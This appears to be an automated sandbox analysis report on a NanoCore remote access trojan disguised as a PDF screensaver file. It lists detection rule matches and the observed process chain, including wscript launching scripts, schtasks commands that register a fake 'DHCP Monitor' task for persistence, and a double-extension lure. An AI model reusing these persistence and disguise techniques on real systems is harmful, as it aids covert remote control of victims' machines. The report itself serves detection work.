Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 6_2_00C0F122
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: String function: 003EF5F0 appears 31 times
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: String function: 003EEC50 appears 56 times
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: String function: 003EEB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: String function: 00BC0DC0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: String function: 00BBFD60 appears 39 times
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_003D6FAA
Sample file is different than original file name gathered from version info
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGDWsrap.exe@ vs 004349256789197.pdf.scr.exe
Source: 004349256789197.pdf.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@43/45@28/1
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D6C74 GetLastError,FormatMessageW, 0_2_003D6C74
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_003EA6C2
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor Jump to behavior
Source: 004349256789197.pdf.scr.exe ReversingLabs: Detection: 44%
Source: 004349256789197.pdf.scr.exe Virustotal: Detection: 39%
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File read: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\004349256789197.pdf.scr.exe C:\Users\user\Desktop\004349256789197.pdf.scr.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File created: C:\Users\user\AppData\Local\temp\Folder10_51 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C24089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 6_2_00C24089
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
